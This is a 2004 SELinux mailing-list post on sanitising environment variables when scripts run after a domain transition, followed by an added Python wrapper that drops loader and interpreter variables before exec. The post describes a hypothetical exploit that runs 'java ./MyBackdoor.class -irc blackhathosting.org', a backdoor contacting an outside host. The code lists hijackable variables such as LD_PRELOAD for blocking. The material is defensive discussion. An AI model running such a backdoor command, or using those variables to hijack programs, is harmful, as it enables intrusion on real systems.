SELinux and the Desktop

Steve Coleman 23e9t5t02 at sneakemail.com
Thu Oct 14 17:56:57 UTC 2004


Colin Walters walters-at-redhat.com |fedora| wrote:

>The major threat here is environment variables, right? 
>
That one is a minor issue in my book, but certainly worth trying to 
enforce in some way.

>I wonder what all
>would break if we changed e.g. bash and python to by default clean
>the environment before executing the script if it was executed from a
>domain transition 
>
Could be a lot. If you sanitize classpath or PERL5LIB a lot could break, 
but if you don't you might not be running what you think you are, which 
leads back to what I was inquiring about.

So just to clarify, what's the difference between a user running a script 
file that does exec "java ./MyClass.class" and a stack overrun causing a 
browser with a smashed stack to save a MyBackdoor.class to the local 
file system and execing "java ./MyBackdoor.class -irc 
blackhathosting.org" ?

In both cases it's the same user, and in both cases it's the same java VM 
binary. The java binary is likely the only process that knows enough to 
enforce anything here based on when, what, and where things are run by 
the user. The browser may try to limit what permissions are passed to 
the exec call but with a smashed stack overrun can you trust it to? Not 
me, at least not yet. This looks to me like the java VM needs to be 
hacked with the SELinux API in order to have any confidence in it, but 
in some ways that duplicates the java security manager's role in life. 
Perhaps we just need a specialized Java security manager, perhaps much 
more. Dunno. But it's a common issue with desktop actions and shells, as 
well as Perl, Python, Ruby, just pick your poison...

I guess what I was looking for was a philosophy for how to handle this 
nebulous issue. The more likely answer is each has its own issues and 
must be dealt with separately in its own special way and must be changed 
to deal with SE. I am hoping for a better option as there is much in SE 
I don't know yet and I do want to understand it in great detail some way 
down the road.

Thanks.
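The "clean the environment before exec" step discussed in the thread, written out as an added example of how a wrapper for an interpreter could do it; this is illustrative code, not from the post, from SELinux or from any distribution. The variable lists, the allowlist and the fixed PATH are assumed policy, and the logging hook is hypothetical.

```python
# Added example (not from the post or from SELinux): sanitise the
# environment before exec'ing an interpreter.  Policy values are assumptions.
import os
import re

# Variables that change which code an interpreter or the dynamic loader
# actually runs.  These are reported when dropped so they can be logged.
DANGEROUS_EXACT = {
    "LD_PRELOAD", "LD_LIBRARY_PATH", "LD_AUDIT",
    "PERL5LIB", "PERLLIB", "PERL5OPT",
    "PYTHONPATH", "PYTHONSTARTUP", "PYTHONHOME",
    "CLASSPATH", "JAVA_TOOL_OPTIONS", "_JAVA_OPTIONS",
    "RUBYLIB", "RUBYOPT", "BASH_ENV", "ENV", "IFS",
}
DANGEROUS_PREFIX = re.compile(r"^(LD_|PYTHON|PERL|RUBY|_?JAVA_)")
# Allowlist: only these survive; everything else is dropped silently.
PASS_THROUGH = {"HOME", "USER", "LOGNAME", "LANG", "TERM", "DISPLAY", "TZ"}
SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"  # fixed, so lookups cannot be redirected


def sanitize_env(env):
    """Return (clean_env, dropped_dangerous).

    clean_env keeps only allowlisted variables and forces PATH;
    dropped_dangerous lists, sorted, the loader/interpreter variables that
    were present, which is what a wrapper should log."""
    clean = {k: v for k, v in env.items() if k in PASS_THROUGH}
    clean["PATH"] = SAFE_PATH
    dropped = sorted(k for k in env
                     if k in DANGEROUS_EXACT or DANGEROUS_PREFIX.match(k))
    return clean, dropped


def exec_clean(argv):
    """Replace this process with argv under the sanitised environment.
    os.execvpe searches the PATH of the env it is given, i.e. SAFE_PATH."""
    clean, dropped = sanitize_env(os.environ)
    if dropped:
        # Hypothetical logging hook: a real wrapper would send this to syslog.
        print("dropping from environment:", ", ".join(dropped))
    os.execvpe(argv[0], argv, clean)


if __name__ == "__main__":
    # Constructed sample environment, as a compromised parent might pass it on.
    sample = {"HOME": "/home/user", "PATH": "/tmp:/usr/bin",
              "LD_PRELOAD": "/tmp/unexpected.so", "CLASSPATH": "/tmp",
              "PERL5LIB": "/tmp/lib", "LANG": "C", "FOO": "bar"}
    print(sanitize_env(sample))
```

SELinux already treats a domain transition as a secure exec (AT_SECURE, unless the new domain is granted `noatsecure`), which makes glibc ignore the LD_* loader variables; the interpreter-specific variables above are the ones that mechanism does not cover.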